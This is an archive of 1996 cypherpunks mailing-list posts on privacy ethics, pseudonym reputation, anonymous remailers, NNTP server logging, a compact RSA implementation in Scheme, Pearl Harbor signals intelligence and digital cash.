> Phill refers to the man who said "Gentlemen do not read each other's
> mail", (Henry L. Stimson) as a twit.
> 
> I highly disagree. In some ways I regard him as our patron saint
> (although the man was actually far from saintly and later as a member
> of the Roosevelt cabinet adopted an opposite policy of aggressive
> signals intelligence.)
> 
> Why is he our patron saint? He was a government official coming out
> against invasion of privacy. Isn't that what we are all after, in the
> end? The reason we deploy cryptography is to assure privacy for
> all. We often refer to those who listen in on conversations
> (regardless of who they are) as, in some sense, our
> opposition. Therefore, is not Stimson's remark in closing down
> Yardley's "Black Chamber" to be praised rather than attacked?
> 
> Perry
> 

Unfortunately what he did was take the emphasis away from personal 
empowerment and personal responsibility for privacy and put it at the 
mercy of some creed or moral stand which had:

1> No common calling or degree of obervance in the population, or the 
intelligence communities at the time.
2> No structure, legal or otherwise, to provide for its enforcement.
3> The rather disturbing impication that no one need take pains to hide 
their private exchanges because a moral standard would protect them.

Instead, at least I always thought, cypherpunks stand for the personal 
empowerment and personal assurance of privcacy.

Indeed everything I can think of discussed here seems to revolve around a 
single goal-  making it easier, and simpler for a person to protect 
him or herself from unwanted intrusion into data he or she wishes to 
protect.  In fact, some goals, especially where transparency is 
concerned, seem to take the even more cynical view that the general 
population would be better off protected by crypto whether they know it 
or not.

Making crypto widely available to the general population, reviewing 
crypto for its implementation, basic skepticism about the protection 
afforded by new systems, basic skepticism for systems produced for 
commercial gain, basic skepticism for government produced systems, 
arguments for the lessening of government involvement in crypto, crypto 
standards, and a powerful dislike for the regulation of communication in 
all forms.  Perhaps most importantly, the production, review and 
discussion of "grass roots" crypto and communications security code.

All these, common themes on the list in my view, push us away from some 
blind notion that all is well in the world, and that man is basically 
good and will not intrude on his fellows.  All these insist that man is 
curious, probing, and that information is by its very nature nearly 
impossible to restrain without powerful methods.  All these insist that 
information will be exposed, be it by accident, malice, theft, by hook or 
by crook, or even well intentioned discourse, unless protected.  Isn't 
this the objection to ITAR?  It is folly to try and restrain information 
by legislation.

It should be clear that it is dangerous to depend on anything, be it 
government, industry, Lotus Notes, the Constitution, the Bill of Rights, 
your best friend's promise, your wife's pillow talk, and least of all a 
misplaced faith in the decency of the common man, when your sensitive 
data is at issue.

In short, crypto helps those who help themselves to crypto.

I have no sympathy what-so-ever for those who lose the privacy of their 
data through negligence.  I believe they should be estopped from 
all complaint.  I believe they are great fools.  Moreover, I note that 
almost without exception, they try to place the cost of their 
missteps on the world at large, and the responsibility for policing 
privacy in the hands of others.  "It was not my fault that I left the 
letter sitting on my desk knowing that the spy convention was about to 
walk in," they whine, "Someone should DO something about all this 
immoral letter reading.  There ought to be a LAW.  How can >I< be 
expected to stop all these spies?"

Is it not clear that allowing this mentality to persist is an unwise and  
dangerous thing?

"Gentlemen do not read other's mail," while noble, clever, and a 
wonderful bit of public relations, ignores the basic reality of the 
modern age.  There are few gentlemen anymore, and even those occasionally 
stumble upon something they might not be entitled to examine.

Not only is crypto smart, but it distributes the (increasingly small) 
costs of protecting data properly.  It puts the burden on the 
least cost avoider, and the individual with the best access to full 
information.  "What is this data worth?  What would exposing it cost 
me?  How much is it worth to spend protecting this data?"  Who better to 
answer these questions than the owner of the data?  How easier to 
protect it than by the negliagable cost of encrypting it?

Not only does placing the burden of data protection on Government or 
society at large miscalculate and misplace the incentives for the 
protection of the data, it also places the selection of degree and method 
of protection on the wrong party as well.

In the end it also causes an undue amount of waste.

When Mr. May indicates that he does not use PGP very often because he 
finds it too much trouble to use for most mail, he is part of a process 
that in the aggregate must save millions of hours and dollars.  He is 
making a decision that data X is only worth an expenditure of Y to 
protect, and that PGP represents an expenditure higher than Y.  
Expenditure Y is thus saved, as would be unlikely in a government program.

Who among us would argue that government, the phone company, or the 
church would better make this judgment?

I would bemoan a world where gentlemen actually never read each other's 
mail.  Such a world would be so vulnerable to the "first market entry" 
into the business of mail reading as to be almost beyond salvage.  A 
certain First Minister of France comes to mind who, by his non-observance 
of the religious restricitons of the day and his alliance with 
traditional enemies of the Church, reduced Germany to 250 years of 
fragementation and assured that, for a time, France was the greatest 
power on earth.  "If there is a God," it was said of him, "the minister has 
much to account for.  If not, well, he had a good life."

The evil snooping man is hero from one perspective.  He is the incentive 
to be risk averse.  He is the skeptic who says that the market is not 
efficient and bets against it and so makes it efficient once more.  Moral 
utopia of the kind that would see no peeping tom's is a fantasy, and the 
evil man a-plenty saves us from Germany's fate.

So then we should brand Mr. Stimpson as a fool, and a liar.  Or at best, 
perhaps a convert who realized quickly (or not so quickly) the error of his 
ways and fell into proper line in his later embrace of signals intelligence.

At the very least we might apply a less optimistic creed.

He who builds on the people builds on mud.

---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Sat, 27 Jan 1996 22:29:11 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Nym use in the real world
In-Reply-To: <199601261801.KAA07578@slack.lne.com>
Message-ID: <199601271414.JAA20590@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Eric Murray writes:
> The other problem (tying the nym to RealName) for employers is
> more severe.  A nym is only good when no one can tie it to your
> real name.  If I have to tell everyone I do work for what my real
> name and nym is, soon enough people will be able to tie the two that
> the nym becomes nearly useless.

Maybe Lucky would be willing to share some wisdom from his experiences
consulting for various companies. (I don't know how much his reputation as
"Lucky Green" has come into play in securing those contracts, and of
course perhaps he really is an Irishman whose parents (the Greens) named 
him "Lucky"....)

The concept of transferable credentials is awkward because the actual 
properties described by the credentials often are not transferable from one
object/entity to another. For example, a cauliflower could in principle have 
a credential certifying that it's a vegetable (according to someone), and 
transfer that veggie credential to a jackal, but the jackal is still not in
fact a vegetable. 

I'm still not sure whether it makes sense to have "reputation capital" 
denominated in an actual currency that can be traded, for the above reason. 
We might use something like a nym-independent(*) credential statement 
signed by a certifier and encrypted to the subject of the credential. 
Pseudonyms and verinyms belonging to various persons/agents/etc. could 
freely swap around these "rep rupees" with potentially very confusing results.

Since credentials need to be backed up by actual performance when it comes to
a job, such a system might actually be acceptable. I could buy a lion taming
credential with some e$, but everyone would realize that I wouldn't last long
on the job if it didn't describe me fairly accurately. ;)  Presumably a
trustable-with-enormous-sums-of-cash credential would command quite a high
price on the open market.

I am ignoring here the significant gap between the passive reputation accrual
when someone reads messages from a nym, and the active reputation building
involved in handing out credentials. 

(*) Form letters are handy, but there's the usual tradeoff between the 
traceability and descriptiveness of the document.

Futplex <futplex@pseudonym.com>
"Despite all my rage I am still just a rat in a cage...."

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMQozKCnaAKQPVHDZAQE0cQf+N1AoRXYhdlFAVZfcE+MAav6DCyyH+b64
UzmKhUGPZnj24inJp0GQ1KVZK9orQ38xz2PFpwBPWbIb3yalcE+HGrQ4uhw5bIrD
pSSrDIGmkbQAy7111Ath/rZwQD6Nrdzu1HO2Mw5k2BNsH5P3keLv1MqYNFg9idgC
vq9KnJmifTIUhgXS5Qog1xA5ssMQ93akL8gYl+AoWaL9q2N3yqiPoBPYe9iq4qxy
1SpSe0fAO53HwSERizvMmIPWW9D7tonPIVUrZEeHPDSGzEHhS/B+V1jUtJo3Wzr0
Ny16ujZ3Ml7Dx0uyASjZuR2EORQu09pfQlu8Z79eehvsoDBKXq/ymQ==
=ZY2q
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Sat, 27 Jan 1996 16:42:11 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199601270818.JAA02695@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Jim Bell writes:

>I notice that you responded through an anonymous remailer, and didn't even 
>use a nym.  This is strange. 

No it isn't.  You run around talking about killing people anonymously, but have trouble with anonymous harsh words?  Color me unimpressed.

I might be someone you know.  I might be a plant.  I might be something else.  Doesn't matter.  The words are the words and stand on their own.

>> are often that way because we think the *means* the State uses are evil, 
>not to be excused by any amount of >mumbo-jumbo.
>
>I think the state's ENDS are evil, too, not merely their MEANS.

I have no argument here.  But good ends do not execuse bad means.  And killing people who are not an immediate threat to you (or someone in your immediate vicinity) is a bad idea.  Play the game of the State and become just like it.

>Actually, if you followed my arguments carefully, you will notice that my 
>position is most accurately described by pointing out that I _could_not_ 
>keep you from participating in this "immoral game", even if I wanted to.

You also didn't mention the problem of fraud.  I set up A. Nony Mouse's Hired Guns Service.  You pay me a lot of money to go off someone.  I come back and say "Sorry, couldn't do it.  Bad traffic."  Then I wander off with the money.  Who are you going to complain to?  I have this sneaky feeling that damn few courts, Statist or otherwise, are going to get worked up over your loss.  And since the whole thing's done anonymously, you are left without a leg to stand on.  Assassination Politics -> Scam-O-Rama.

>For the record, I suspect some people who are total pacifists view the rest 
>of us, those willing use use violence to defend ourselves, as "immoral."

I agree.  But then I'm not a total pacifist.  Self-defense is an inherent right.  Llap-gauche is not.

>Aha!  You're implying (actually, implying is an understatement here) that I 
>am an "agent provocateur." 

Nope.  Just pointing out that you are doing the job of an agent provacateur very well.  But your reply goes a long way toward moving you out of that category and into the category of KoTM fodder.

Signed,
A Friend

PS.  This whole thing really is off-topic.  I'm letting it drop now.  Bluster to your heart's content.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@sendai.cybrspc.mn.org (Roy M. Silvernail)
Date: Sun, 28 Jan 1996 00:21:25 +0800
To: gorkab@sanchez.com (Brian Gorka)
Subject: Re: (none)
In-Reply-To: <01BAEBF5.1492F480@loki>
Message-ID: <960127.094903.2P0.rnr.w165w@sendai.cybrspc.mn.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, gorkab@sanchez.com writes:

>
> I was leafing through the new terms of service from my ISP, and lookie what 
> I came up with:

>  * Impersonating another user or otherwise falsifying one's user name
>    in e-mail or any post to any newsgroup or mailing list is
>    strictly prohibited.

> The second point make me wonder if NymServers are logal to use with my 
> service (PSInet, Interramp)

IANAL, but I don't see where using your own nym is "falsifying one's
user name".  Using someone else's nym would be.
- -- 
           Roy M. Silvernail     [ ]      roy@cybrspc.mn.org
PGP Public Key fingerprint =  31 86 EC B9 DB 76 A7 54  13 0B 6A 6B CC 09 18 B6
                Key available from pubkey@cybrspc.mn.org

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMQpKUBvikii9febJAQGGSQP/TzEve57rx+oATpBY+zjYIKLghfTdbIq/
lQZgkcOzgjS1ivFTlJeoGlgE9xclvJzTgxhGHoySMi4E4YeHMJgqIixaoqWeEj8A
bzZq7Ij3gQ2NCabxdwaArAfb3PAOyjskknVYPeX3c5KvEULWyaBY8TQILgGWVpkI
F93WEFN4i4c=
=Argr
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Sat, 27 Jan 1996 23:52:15 +0800
To: cypherpunks@toad.com
Subject: Re: Open NNTP servers and logging
In-Reply-To: <199601270633.AAA09641@unique.outlook.net>
Message-ID: <81aDiD60w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Michael Peponis" <mianigand@unique.outlook.net> writes:
> On 26 Jan 96 at 21:11, Stephen Albert wrote:
> > A little while back there were some very helpful posts about getting starte
> > wit open NNTP servers.  Since my regular site runs kinda slow in the news
> > department I've been having fun poking around and seeing about getting more
> > current.
> >
> > Then it dawned on me.  People keep logs.  Presumably routine logging would
> > point right back at my ISP, and from there it'd be not too hard to pin down
> > specifically.  No, I don't think anyone is particularly *likely* to do that
> > but why take chances?
>
> Well, as bad as the lack of anonymity may be, NNTP server logs serve a very
> usefull purpose, ie finding and eliminating trolls and spammers.

I think Stephen Albert was asking about the possibility of using logs to find
out what he's reading, not posting. That's quite possible. Recall the recent
incident when an unethical researcher looked through his colleagues' .newsrc
files to see what newsgroups they were subscribed to.

If this concerns you, perhaps you could use something like an anonymous HTTP
proxy to connect "really anonymously" to an NNTP server?

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Sun, 28 Jan 1996 03:59:28 +0800
To: cypherpunks@toad.com
Subject: Re: Nym use in the real world
In-Reply-To: <199601271414.JAA20590@thor.cs.umass.edu>
Message-ID: <199601271935.LAA15633@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain


Futplex writes:
> Eric Murray writes:
> > The other problem (tying the nym to RealName) for employers is
> > more severe.  A nym is only good when no one can tie it to your
> > real name.  If I have to tell everyone I do work for what my real
> > name and nym is, soon enough people will be able to tie the two that
> > the nym becomes nearly useless.
> 
> Maybe Lucky would be willing to share some wisdom from his experiences
> consulting for various companies. (I don't know how much his reputation as
> "Lucky Green" has come into play in securing those contracts, and of
> course perhaps he really is an Irishman whose parents (the Greens) named
> him "Lucky"....)

[..]

> >I'm still not sure whether it makes sense to have "reputation capital"
> denominated in an actual currency that can be traded, for the above reason.
> We might use something like a nym-independent(*) credential statement
> signed by a certifier and encrypted to the subject of the credential.
> Pseudonyms and verinyms belonging to various persons/agents/etc. could
> freely swap around these "rep rupees" with potentially very confusing results.
> 
> Since credentials need to be backed up by actual performance when it comes to
> a job, such a system might actually be acceptable. I could buy a lion taming
> credential with some e$, but everyone would realize that I wouldn't last long
> on the job if it didn't describe me fairly accurately. ;)  Presumably a
> trustable-with-enormous-sums-of-cash credential would command quite a high
> price on the open market.


This is all well and good, but highly theoretical.  It might
happen someday, but right now reputations don't work that way.
If I gave a reputation certificate to a prospective client
they'd just look at it and say "huh?".

Some groups do indeed deal well with nym's reputations.  If Emmanuel
Goldstein shows up at a hacker's convention, everyone knows who
he is and what he's done.

Alas, most regular businessmen don't want to deal with someone named
"Agent Steal"[*], at least not to the point of signing checks to him.

Perhaps a partial solution is to pick a nym that sounds like a real
name, like "Tim May" or "Jeff Weinstein".  There's still a problem
of proving that I am the same "Tim Weinstein" that the prospective
client has exchanged email with.  But to be honest, they don't know
if I'm the same "Eric Murray" they have been emailing either...



*- to pick a random hacker's nym. 

-- 
Eric Murray  ericm@lne.com  ericm@motorcycle.com  http://www.lne.com/ericm
PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03  92 E8 AC E6 7E 27 29 AF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Sun, 28 Jan 1996 03:58:03 +0800
To: cypherpunks@toad.com
Subject: Prime Time....
In-Reply-To: <199601252307.QAA15015@usr5.primenet.com>
Message-ID: <Pine.SOL.3.91.960125170928.1505H-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


Something I ran across in an old book on number theory

In 1953 D.H.Lhmer used the SWAC calculator to check for Mersenne primes 
(2^n-1). The largest one found was n=2281 - the runtime was 66 minutes.

Anybody with access to one of the new Cray fish-tanks want to get a 
datapoint for the closest machine in 96 so we can check on how well 
Moore's law worked?

Simon // Suddenly my Powerbook 140 seems fast again




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ulf_Moeller@public.uni-hamburg.de (Ulf Moeller)
Date: Sat, 27 Jan 1996 19:17:57 +0800
To: cypherpunks@toad.com
Subject: RSA in 4 lines of Scheme
Message-ID: <m0tg81g-00009gC@ulf.mali.sub.org>
MIME-Version: 1.0
Content-Type: text/plain


(define(RSA m e n)(list->string(u(r(s(string->list m))e n))))(define(u a)(if(>
a 0)(cons(integer->char(modulo a 256))(u(quotient a 256)))'()))(define(s a)(if
(null? a)0(+(char->integer(car a))(* 256(s(cdr a))))))(define(r a x n)(cond((=
0 x)1)((even? x)(modulo(expt(r a(/ x 2)n)2)n))(#t(modulo(* a(r a(1- x)n))n))))

                                    ;;;;
                                    ;;;;

(define c (RSA "The magic words are squeamish ossifrage" 5 114381625757888867669235779976146612010218296721242362562561842935706935245733897830597123563958705058989075147599290026879543541))
(display (RSA c 45752650303155547067694311990458644804087318688496945025024737159778909096647814932594914301288138204957467016445183857236173773 114381625757888867669235779976146612010218296721242362562561842935706935245733897830597123563958705058989075147599290026879543541))




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Sun, 28 Jan 1996 01:10:33 +0800
To: llurch@networking.stanford.edu
Subject: Re: "Gentlemen do not read each other's mail"
Message-ID: <Pine.BSD.3.91.960127114658.24287B-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
  Rich, 
 
 
  On 01 26 96 you say: 
 
    ...the US might have received credible reports that Pearl 
    Harbor was going to be bombed. But they also received cred- 
    ible reports to the contrary, and decisions were made. 
 
 
  Bamford's 1983 The Puzzle Palace, page 57: 
 
    In December 1941 American COMINT [communications intelli- 
    gence] more closely resembled a medieval feudal state than 
    the empire it is today. 
 
 
  P 58: 
 
    The system was a hodgepodge.  No one was responsible for a 
    continuous study of all material. *** Though the technical 
    side of COMINT, particularly in the breaking of Purple, had 
    been performed with genius, the analytical side had become 
    lost in disorganization. 
 
 
  That's the background.  Then Bamford step by step follows the 
  events 
 
            of the first Sunday in December 1941 
 
 
  FROM (p 58) interception of the Japanese government reply to the 
  US government "diplomatic note" [=declaration of war] sent 11 days 
  before calling "on Japan to withdraw all its forces from China and 
  Indochina in return for a U.S. promise to release Japanese funds 
  and resume trade" 
 
  TO (p 61): 
 
    At 7:55 A.M. [Hawaii time], the first bomb smashed into a sea- 
    plane ramp on Ford Island in Pearl Harbor.  Before the last bomb 
    whistled down through the black and orange sky two hours later, 
    Americans would give their lives at the rate of almost thirty a 
    minute. 
 
 
  A note accompanying the Japanese government reply included these 
  prophetic words (p 59): 
 
    Will the Ambassador please submit to the United States Govern- 
    ment (if possible to the Secretary of State) our reply to the 
    United States [breaking off negotiations] at 1:00 P.M. on the 
    7th, your time. 
 
 
  1 PM Washington time = 7:30 AM Hawaii time. 
 
 
  Bamford, p 60 (my emphasis): 
   
    It was now about 11:00 A.M. [in Washington], almost six hours 
    after the giant ear on Bainbridge Island had first snared the 
    prophetic message, and ALL OF WASHINGTON'S SENIOR ELITE HAD 
    READ IT. 
 
 
 
  P 61: 
 
    At 2:40 P.M. [Hawaii time] the [Ft Shafter] signal officer 
    passed [Army Chief of Staff Marshall's warning] message to 
    the decoding officer, and twenty minutes later,...Marshall's 
    warning at last reached a devastated General Short. 
 
 
  The credible report was received at 7:55 AM Hawaii time. 
 
  The incredible report was received at 3 PM Hawaii time. 
 
  One decision was made 11 days earlier.  Another was finalized 
  10 days later.
 
  Bamford dryly concludes (p 62): 
 
    Disorganization and divided responsibility had cost America 
    dearly. 
 
 
  Cordially, 
 
  Jim 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Sun, 28 Jan 1996 01:26:11 +0800
To: cypherpunks@toad.com
Subject: Re: Crypto Exports, Europe, and Conspiracy Theories
Message-ID: <199601271703.MAA07888@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


I missed Tim's post of Jan 24, 1996 23:18:21, where he wrote, among other
things:: 
 
 
> 
>Once one has good encrypted links, including access to a variety of 
>offshore sites,  remailers cannot be stopped. The TLAs may not like them, 
>and the courts may rule that a remailer site is strictly liable for 
>misdeeds which impinge on its remailers (I'm not convinced this is so, but

>no matter), but what do U.S. courts have to say about Dutch remailer
sites? 
>What will the Fifth Circuit be able to do to hactic.nl? Or chains of 
>remailers that pass through Norway, Japan, Estonia, Italy, and Lower 
>Slobovia? 
> 
 
My dystopian sense leads me to believe that there will be an international
treaty banning them. 
 
I speak to some agricultural-utopians today who believe the world's
problems can be solved if hemp is legalized. They describe the process
where it was made illegal. Essentially one individual in the government,
"Drug czar" Harry Anslem (?) whipped up a global hysteria and got an
international treaty passed against the hemp trade. 
 
I suspect the hysteria over the Four Horsemen is already more extreme
internationally than Anslem's hysteria ever was. 
 
I see two strategies existing over issues of anonymity/remailers/etc. 
 
The first is the elite one (and I do not use the word in a derogatory
sense.) It focuses on a limited number of remailers, located in different
countries, and all internationally known. 
 
The second is what I call the "mass strategy" (and I hope that the
libertarians on the cypherpunk list do not treat the word in a derogatory
sense). 
 
Luckily for all of us the two strategies are in no way mutually
contradictory. If anything they tend to reinforce each other. 
 
I see PZ's development of PGP as the first development in the mass
strategy. Before PZ, quality crypto was limited to monarchs and
bureaucrats. After PZ, the same (or even superior) crypto was made
available, both technologically and monetarily, to almost everyone in the
world. 
 
Linux was another mass strategy development. 
 
So was the development of new replaceable 100+ Mb drives likes those from
IOmega and Syquest. 
 
So was the development of front-ends for the PGP/remailer combinations like
Private Idaho and John-Doe. 
 
So does the development of new data transmission technologies, marked by
the simultaneous increase of bandwidth and decrease in costs. 
 
These developments create the technological basis for the mass
proliferation of remailers. 
 
At present we rely on elite remailers, marked by skilled sysops and a
global knowledge of the location of the system. 
 
I would like to see a system of mass remailers, many-to-most of which will
initially not be up for very long. For many people this will not be a
significant problem as the remailers proliferate faster than others go
down. 
 
In other words, I think we will see a time when Captain Boneblood (aka
Billie Smith, age 13) uses the remailer provided by Baron SkuelDrool (aka
Tom Jones, age 14) running off SkuelDrool Sr's computer in the SkruelDrool
family rec-room of Suburbia USA. 
 
The SkuelDrool remailer might never be up for more than a month and will
never be widely known outside the narrow circle of the in-crowd at Warren
G. Harding Jr. High. But before the SKuelDrool remailer goes down, another
two remailers go up at Dan Quail Jr. Collitch and Aaron Burr Sr. High. 
 
The mass remailer network will never replace the elite remailers that will
always have technological advantages over the mass network. 
 
But the combination of elite and mass remailers will make government
crackdowns -- whether local, nationa, or international -- much harder. 
-- 
tallpaul 
 
"To understand the probable outcome of the Libertarian vision, see any
cyberpunk B movie wherein thousands of diseased, desparate and starving
families sit around on ratty old couches on the streets watching television
while rich megalomaniacs appropriate their body parts for their personal
physical immortality." 
     R. U. Sirius 
     _The Real Cyberpunk Fakebook_




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Sun, 28 Jan 1996 01:34:10 +0800
To: cypherpunks@toad.com
Subject: Re: [NOISE] Re: "Gentlemen do not read each other's bank	  statements"
Message-ID: <v02120d18ad30032749df@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


>tenuous-at-best connection to cypherpunks material - using a currency
>backed only by the supply of ones and zeroes requires a market mechanism
>to encourage the issuers not to overdo it....

Aggregious plug time.

The above comment is *not* so tenuously connected to my e$ lists. I've been
sending juicer bits of this particular discussion on to e$pam, my
e$-filter-list of other news and mail groups, where the above comment in
particular is germaine.  If you want to continue your discussions on
e$pam's discussion list, e$, you will be welcome.

Subscribe to e$ by sending, in the the body of your message to
majordomo@thumper.vmeng.com :

subscribe e$

I've been sending other money related stuff to e$pam, from places like the
AustrianEcon (Hyek, Mises, et.al) list, so people on e$ are at least
*interested* in intellegent comments about money of all kinds, in
particular the kind made of 1s and 0s.

e$'s unmoderated, and has, as they say in the money business, "endogenous"
traffic. ;-). Most of it originates on the list itself.

Cheers,
Bob Hettinga



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"Reality is not optional." --Thomas Sowell
The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sun, 28 Jan 1996 05:07:42 +0800
To: attila <attila@primenet.com>
Subject: Re: OFFSHORE RESOURCES (where?)
In-Reply-To: <Pine.BSD.3.91.960127195429.20232D-100000@usr2.primenet.com>
Message-ID: <Pine.SUN.3.91.960127122718.11172B-100000@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Sat, 27 Jan 1996, in reference to my post OFFSHORE RESOURCES,
attila wrote:

> 	that's nice, Sandy.  but where is URL?

He was not the only one.

Due to the vicissitudes of the C'punks' list, my correction
arrived before my post for some people.  the URL is:

			www.ocra.com

As Tim correctly pointed out, the Net has carried information on
offshore banking and related topics for some time.  My point was
that--as far as I can tell--OCRA is the first major one-stop
supplier of offshore incorporation, trust and banking services
to open a Web site.

More important, though, is the content of their site.  Whether
or not one does business with them, their site offers a very
good primer on the whys and wherefors of going offshore.


 S a n d y

P.S.  I've received a couple of dozen RSVPs for my costume
      party on 10 February.  I'd like those of you who will
      be in the Bay Area on that date and have not responded
      to let me know if you will or will not be in attendance.  
      Also, if you have any suggestions for a free or cheap
      band, let me know.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Sun, 28 Jan 1996 02:12:02 +0800
To: cypherpunks@toad.com
Subject: Re: Open NNTP servers and logging
Message-ID: <9601271753.AA11563@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>I think Stephen Albert was asking about the possibility of using logs to find
>out what he's reading, not posting. That's quite possible. Recall the recent
>incident when an unethical researcher looked through his colleagues' .newsrc
>files to see what newsgroups they were subscribed to.

Most NNTP sites run INN, the software I wrote.  (You can find out by
doing "telnet {the_news_host} 119" and then looking to see if it says
InterNetNews in the greeting line.)  By default, INN logs every group
command -- every time you switch to a newsgroup.  It logs the full IP
address of the client.  If it can forward-and-backward map the IP address
to a hostname (i.e., ipaddr->host and then gethsotbyname() includes ipaddr
as one of the host's address) then it logs by client hostname.

It is trivial to turn on full logging at compile time, boot time, or
per-connection via a management program.  This will then log ALL interactions.
I could imagine that without too much work, someone would turn on logging
for a given set of addresses (say, anyone in the "default" category).

Every day INN generates a report that includes the host/ipaddr of every
host that connected, what the most popular newsgroup categories are, etc.

Hope this helps.  Relevance?  You're being watched.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sun, 28 Jan 1996 03:42:42 +0800
To: bruceab@teleport.com
Subject: Re: Cypherpunk Elitism
Message-ID: <01I0IAXM7O8OA0UP9Y@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"bruceab@teleport.com"  "Bruce Baugh" 26-JAN-1996 01:51:04.39

>At 07:15 PM 1/25/96 EDT, "E. ALLEN SMITH" <EALLENSMITH@mbcl.rutgers.edu> wrote:

>       You might also find Robert Reich's _The Work of Nations_
>interesting.

As a short, elegant, powerful argument against statist thinking, I recommend
most highly Kenichi Ohmae's THE END OF THE NATION STATE: THE RISE OF
REGIONAL ECONOMIES. Mr Ohmae focuses on areas that have geographical and
social meaningfulness, on the scale of Hong Kong/Canton, Catalonia, the
Pacific Northwest, and so forth. He quickly makes hash of the idea that the
nation-state is a meaningful unit for modern economic analysis.
--------------------
	Actually, Reich realizes this.... and (being a liberal) opposes the
various trends causing it. I can email people an interview with him that
shows his thinking on the matter. One point he makes is that nations with high
tax rates and high levels of social services (such as Canada) are losing
symbolic analysts to and gaining routine producers from nations with low tax
rates and low levels of social services (such as the US). Being a liberal, he
doesn't like this trend, and wants the US to raise taxes and social services
(without apparantly seeing that this will simply put the US in the same boat
as Canada, etcetera).
	Cypherpunks relevance? First, anonymous digital cash will make it
awfully difficult to have those high tax rates. Second, this gives rise to the
phenomenon of anonymous digital cash usage probably being more common among
the economically and intellectually elite than among the "peons". They're the
ones with something to lose by the tax rates. I haven't had time yet to read
Dr. May's piece on Virtual Communities, but I have had the thought that
private anonymous digital cash makes such separation a lot easier. Reich
doesn't like people splitting off into seperate communities, and wants to
oppose it- like Christopher Lash, the late populist writer of _The Revolt of
the Elites_. Fortunately, anonymous digital cash makes such opposition a lot
harder.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sun, 28 Jan 1996 04:01:21 +0800
To: rsalz@osf.org
Subject: Re:  Crypto Exports, Europe, and Conspiracy Theories
Message-ID: <01I0IB8IKV6AA0UP9Y@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"rsalz@osf.org"  "Rich Salz" 26-JAN-1996 04:39:43.50

>I believe that one minor reason is the PKP chokehold on public-key patents.
It has slowed down adoption within the US, and the RSA licenses for example
tend to get very "interesting" when it involves places where their patents
don't hold.
----------------
	Speaking of other countries' non-recognition of algorithms as
patentable, are David Chaum's patents on digital cash enforceable outside of
the US?
	Thanks,
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sun, 28 Jan 1996 04:10:29 +0800
To: alano@teleport.com
Subject: Re: [rant] A thought on filters and the V-Chip
Message-ID: <01I0IBKWFBJCA0UP9Y@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


